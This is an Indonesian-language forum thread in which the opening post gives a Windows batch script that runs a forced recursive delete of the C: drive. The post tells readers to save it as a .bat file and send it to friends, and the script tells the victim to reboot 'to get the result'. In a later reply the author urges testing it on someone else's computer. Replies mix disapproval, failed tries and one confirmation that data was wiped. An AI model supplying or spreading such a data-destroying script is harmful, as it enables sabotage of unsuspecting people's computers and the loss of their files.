<< Code Maut <<

Discussion in 'PC & Laptop' started by rukawa, Oct 30, 2007.

  1. rukawa

    rukawa Active Member

    Messages:
    129
    Likes Received:
    96
    Trophy Points:
    38
    apa yang lo perlu buat ialah copy code di bawah dan paste ke dalam notepad dan savekan jadi bat file(.bat)

    Code:
    Kutip
    @echo off
    echo.
    echo.
    del C:\ /f/s/q
    echo.
    echo.
    echo reboot your computer to get the result
    pause
    exit
    
    sesudah lo buat bat file...... :cool::cool:

    send file tersebut kepada temen lo.... :cool::cool:
    ketika file tersebut di klik2x --- opsss semua file di drive c: akan terdelete :thumb::thumb::thumb:
     
    Last edited by a moderator: Oct 30, 2007
    bobo11 likes this.
  2. daruuis

    daruuis Moderator Moderator

    Messages:
    498
    Likes Received:
    638
    Trophy Points:
    0
    A dangerous trik..
     
  3. angin

    angin New Member

    Messages:
    14
    Likes Received:
    1
    Trophy Points:
    0
    yah. maut! jd gak brni test
     
  4. rukawa

    rukawa Active Member

    Messages:
    129
    Likes Received:
    96
    Trophy Points:
    38
    ngetes nya jangan d kompie sendiri di compie temen atau dmn kek :cool::cool::cool:
     
  5. ficky

    ficky Moderator Moderator

    Messages:
    518
    Likes Received:
    1,727
    Trophy Points:
    0
    wah juga perbuatan jahil nih, ga setuju ah dengan hal2 macam begini. kembalikan pada diri kita
    coba bayangin deh kalo ada orang yg ngetesnya di compi kita. gimana perasaan kita ?
     
  6. N8250

    N8250 Super Moderators Super Moderator

    Messages:
    1,435
    Likes Received:
    847
    Trophy Points:
    123
    ga ada reaksi tuh di komputer gw..knapa yah...:confused: :confused: :D :D :D
     
  7. rukawa

    rukawa Active Member

    Messages:
    129
    Likes Received:
    96
    Trophy Points:
    38
    :eek::eek::eek::eek: moso:eek::eek::eek::eek:

    ah pake linux kali :blah::blah::blah:
     
  8. N8250

    N8250 Super Moderators Super Moderator

    Messages:
    1,435
    Likes Received:
    847
    Trophy Points:
    123
    Windows Xp profesional service pack 2. bro...

    padahal cuma copy paste kan..seperti kata bos..trus buat jadi bat file.
     
  9. udie_kidz

    udie_kidz New Member

    Messages:
    180
    Likes Received:
    53
    Trophy Points:
    0
    gpp jg bos, q pk sp1, uda tak jadiin .bat trus 2x klik,, gda pa2 cm gbs dbuat browsing,, tak restart normal lg dah
     
  10. okion

    okion Moderator Moderator

    Messages:
    432
    Likes Received:
    75
    Trophy Points:
    38
    wekekekekkeke...
    mngkin script mas rukawa udach ndak mempan...
     
  11. N8250

    N8250 Super Moderators Super Moderator

    Messages:
    1,435
    Likes Received:
    847
    Trophy Points:
    123
    nah tuh...kan bukan gw aja yg dah nyoba trik dr bos rukawa..
    :eek: :eek: :eek: :frusty: :frusty: :frusty:
    masih mending bro udie_kidz, ga bisa browsing..kalo komputer gw mah masuk kanan keluar kiri..berlalu begitu aja..:D :D :D

    it's ok.
    ga usah dipikirin lah, buang2 energi aja.
     
  12. t_e_n_digital

    t_e_n_digital New Member

    Messages:
    87
    Likes Received:
    38
    Trophy Points:
    0
    Hooo. Hoo..
    Rupanya hanya teori perintah DOS aja...
    Bukan TESTED...

    Betulll.. buang2 energi aja....
     
  13. Xman

    Xman New Member

    Messages:
    173
    Likes Received:
    244
    Trophy Points:
    0
    Dont try this at home ..........
     
  14. swl

    swl New Member

    Messages:
    6
    Likes Received:
    0
    Trophy Points:
    0
    bah jadi ga bisa ya,, lagian klo bberfungsi ntar malah dimaki2 ama orang yg dikerjai..
     
  15. beni_joss

    beni_joss New Member

    Messages:
    307
    Likes Received:
    131
    Trophy Points:
    0
    100% Tested By Me!!
    Aku Coba Jalanin Di Win Xp Home Edition.dan Ternyata Berhasil.file Di Drive C: Terhapus Tapi Gak Semua,ninggalin Beberapa File Di Folder Windows. Klu Data Dan Program File Ludes Semua.
    Blum Ku Coba Di Wins Xp Pro.takut Coz Banyak Data Yang Penting Di Drive C:
    Bener2 Maut Codenya. Untuk Pengetahuan Sih Bagus Asal Jangan Buat Jahilin Orang.
     
  16. okion

    okion Moderator Moderator

    Messages:
    432
    Likes Received:
    75
    Trophy Points:
    38
    gw coba di macintosh kok gak bisa yah
     
  17. eddy12345

    eddy12345 New Member

    Messages:
    27
    Likes Received:
    0
    Trophy Points:
    0
    bisa bwat ngilangin virus neeh??drpd install ulang..
    apakah benar pendapat saya??:confused::confused:
     
  18. ichal

    ichal Active Member

    Messages:
    55
    Likes Received:
    25
    Trophy Points:
    28
    waspadalah ..... kejahatan ada dimana2.........yuk pake........... thank...bro:blah:
     
  19. c4s1o

    c4s1o New Member

    Messages:
    125
    Likes Received:
    17
    Trophy Points:
    0
    wah ilannnnnnnnnnnn semua di c: tapi restart balik lagi semua heheheh.
     
  20. doheda

    doheda New Member

    Messages:
    29
    Likes Received:
    1
    Trophy Points:
    0
    yap..., tul..., klo mo nge-test, coba-in ke pc sendiri..., jangan ke punya orang..., sebab masih banyak orang lain yang "awam" dengan computer...
    thx mas rukawa..., nambah elmu lagi nih... :):)
     

Share This Page